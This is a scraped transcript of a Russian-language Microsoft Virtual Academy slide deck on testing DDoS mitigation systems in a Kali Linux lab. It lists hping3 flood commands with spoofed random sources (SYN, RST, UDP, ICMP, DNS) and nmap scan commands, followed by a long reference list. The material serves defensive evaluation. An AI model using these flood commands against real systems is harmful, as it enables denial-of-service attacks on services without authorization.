Presentation is loading. Please wait.

Presentation is loading. Please wait.

Microsoft Virtual Academy Leonid Shapiro | IT Architect, MCT, MVP Enterprise Security, MCSE, RCSS, CCEE.

Similar presentations


Presentation on theme: "Microsoft Virtual Academy Leonid Shapiro | IT Architect, MCT, MVP Enterprise Security, MCSE, RCSS, CCEE."— Presentation transcript:

1 Microsoft Virtual Academy Leonid Shapiro | IT Architect, MCT, MVP Enterprise Security, MCSE, RCSS, CCEE

2 Meet Leonid Shapiro Архитектор ИТ систем –Специалист в области ИТ и ИБ –MCT, MVP, MCSE, RCSS, CCEE Более 15 лет в ИТ –Microsoft, Citrix, Radware –Опубликовано более 50-и статей в журналах «Бизнес и Информационные Технологии» и «Системный Администратор»

3 Принципиальная схема стенда

4 Используем Kali Linux для тестов

5 В атаку…! Тестовая проверка Синтаксис команды TCP-SYNhping3 -p 80 -S --rand-source --faster TCP-RSThping3 -p 80 -R --rand-source --faster UDP floodhping3 --udp -i u1 --rand-source -p 80 ICMP floodHping3 --icmp -i u1 --rand-source UDP flood на DNS сервер hping3 --udp -i u1 --rand-source --destport 53 -x -g 500 -m 1000 -d 1000 & hping3 -- udp -i u1 --rand-source --destport 53 TCP сканnmap -sS -F UPD сканnmap -sU -F

6 DEMO Microsoft Virtual Academy Проверка системы отражения

7 Выводы DDoS атаки опасны. Их просто организовать Существуют различные системы отражения. Задача – выбрать наиболее эффективную Проверка различных систем отражения атак выполняется на наборе идентичных тестов и в рамках единой среды Самостоятельная проверка вполне возможна Информационная безопасность – задача профессионалов

8 Полезные материалы Radware DDoS Handbook http://www.radware.comhttp://www.radware.com RFC: 793 http://www.ietf.org/rfc/rfc0793.txt [4] Explanation of the Three-Way Handshake via TCP/IP https://support.microsoft.com/en-us/kb/172983http://www.ietf.org/rfc/rfc0793.txt https://support.microsoft.com/en-us/kb/172983 TCP Connection Establishment Process: The "Three-Way Handshake" http://www.tcpipguide.com/free/t_TCPConnectionEstablishm entProcessTheThreeWayHandsh-3.htm http://www.tcpipguide.com/free/t_TCPConnectionEstablishm entProcessTheThreeWayHandsh-3.htm Атаки TCP- RESET http://linuxpoison.blogspot.ru/2008/05/what-is-tcp-reset- attacks.html http://linuxpoison.blogspot.ru/2008/05/what-is-tcp-reset- attacks.html https://en.wikipedia.org/wiki/TCP_reset_attackhttps://en.wikipedia.org/wiki/TCP_reset_attack Что такое HTTP flood http://www.youtube.com/watch?v=BzgsT-_GC4Q http://www.youtube.com/watch?v=BzgsT-_GC4Q DDoS атаки ЦБ России http://sberex.ru/news/4443, http://www.interfax.ru/russia/364686,http://sberex.ru/news/4443 http://www.interfax.ru/russia/364686 РИА Новости «Банк России полностью восстановил работу сайта после DDos-атаки» http://ria.ru/economy/20140314/999514759.html http://ria.ru/economy/20140314/999514759.html РБК Сайт газеты "Ведомости" подвергся DDoS-атаке http://top.rbc.ru/society/30/01/2014/902338.shtml http://top.rbc.ru/society/30/01/2014/902338.shtml РБК Сайт «Ленты.ру» подвергся DDoS-атаке http://www.rbcdaily.ru/society/562949990831824 http://www.rbcdaily.ru/society/562949990831824 Российская газета http://www.rg.ru/2014/03/13/1kanal- ddos-site.htmlhttp://www.rg.ru/2014/03/13/1kanal- ddos-site.html For Webber http://www.for-webber.ru/?p=15169http://www.for-webber.ru/?p=15169 PC Week http://www.pcweek.ru/security/news- company/detail.php?ID=174944http://www.pcweek.ru/security/news- company/detail.php?ID=174944 Шапиро Л. Атаки DDoS. Часть 1. Война объявлена... // «БИТ», №5, 2015 г. – С. 28-31, (http://bit.samag.ru/archive/article/1504)http://bit.samag.ru/archive/article/1504 Шапиро Л. Атаки DDoS. Часть 2. Арсенал противника // «БИТ», №6, 2015 г. – С. 24-27, (http://bit.samag.ru/archive/article/1521)http://bit.samag.ru/archive/article/1521 Шапиро Л. Атаки DDoS. Часть 3. Разведка // «БИТ», №7, 2015 г. – С. 12-15, (http://bit.samag.ru/archive/article/1536)http://bit.samag.ru/archive/article/1536) Шапиро Л. Атаки DDoS. Часть 4. Военные хитрости // «БИТ», №8, 2015 г. – С. 22-23, http://bit.samag.ru/archive/article/1559 http://bit.samag.ru/archive/article/1559 Шапиро Л. Атаки DDoS. Часть 5. Основные принципы выбора систем защиты от DDoS атак // «БИТ», №9, 2015 г. – С. 34-38, http://bit.samag.ru/archive/article/1580http://bit.samag.ru/archive/article/1580 Шапиро Л. Атаки DDoS. Часть 6. Защита корпоративной инфраструктуры. Знакомство с Radware Defense Pro. Защита корпоративного ЦОД // «БИТ», № 5, 2016 г. – С. 32-35, http://bit.samag.ru/archive/article/1689http://bit.samag.ru/archive/article/1689 Шапиро Л. Атаки DDoS. Часть 7. Бронепробиваемость // «БИТ», №6, 2016 г. – С. 32-36, http://bit.samag.ru/archive/article/1712 http://bit.samag.ru/archive/article/1712 Шапиро Л. Атаки DDoS. Часть 8. Защита от сетевых атак // «БИТ», №7, 2016 г. – С. 16-19, http://bit.samag.ru/archive/article/1726 http://bit.samag.ru/archive/article/1726 Модель OSI (https://en.wikipedia.org/wiki/OSI_model)https://en.wikipedia.org/wiki/OSI_model Why Slow and Low DDoS Application Attack are Difficult to Mitigate? (http://blog.radware.com/security/2013/06/why-low- slow-ddosattacks-are-difficult-to-mitigate)http://blog.radware.com/security/2013/06/why-low- slow-ddosattacks-are-difficult-to-mitigate Атака R.U.D.Y. (R-U-Dead-Yet?) http://security.radware.com/knowledge- center/DDoSPedia/rudy-r-u-dead-yet/ http://security.radware.com/knowledge- center/DDoSPedia/rudy-r-u-dead-yet Примеры атак http://security.radware.com/knowledge- center/DDoSPedia/rudy-r-u-dead-yet/, http://security.radware.com/experts-insider/learn-from- Experts) https://en.wikipedia.org/wiki/Slowloris_(software)http://security.radware.com/knowledge- center/DDoSPedia/rudy-r-u-dead-yet/ http://security.radware.com/experts-insider/learn-from- Expertshttps://en.wikipedia.org/wiki/Slowloris_(software) Remove Blind Spots with Radware’s SSL Traffic Inspection Solution https://www.radware.com/PleaseRegister.aspx?returnUrl=64 42455966 https://portals.radware.com/getattachment/4930a6f6-eeae- 44ac-a943-f0e9c6a92536/.aspx/ https://www.radware.com/PleaseRegister.aspx?returnUrl=64 42455966 https://portals.radware.com/getattachment/4930a6f6-eeae- 44ac-a943-f0e9c6a92536/.aspx/ OWASP Top Ten https://www.owasp.org/index.php/Category:Attack https://www.owasp.org/index.php/Category:Attack Kali Linux https://www.kali.orghttps://www.kali.org HPING3 http://tools.kali.org/information-gathering/hping3http://tools.kali.org/information-gathering/hping3 Мониторинг и анализ сетевого трафика https://www.wireshark.org/ https://www.microsoft.com/en- us/download/details.aspx?id=4865https://www.microsoft.com/en- us/download/details.aspx?id=4865

9 ©2014 Microsoft Corporation. All rights reserved. Microsoft, Windows, Office, Azure, System Center, Dynamics and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries. The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.


Download ppt "Microsoft Virtual Academy Leonid Shapiro | IT Architect, MCT, MVP Enterprise Security, MCSE, RCSS, CCEE."

Similar presentations


Ads by Google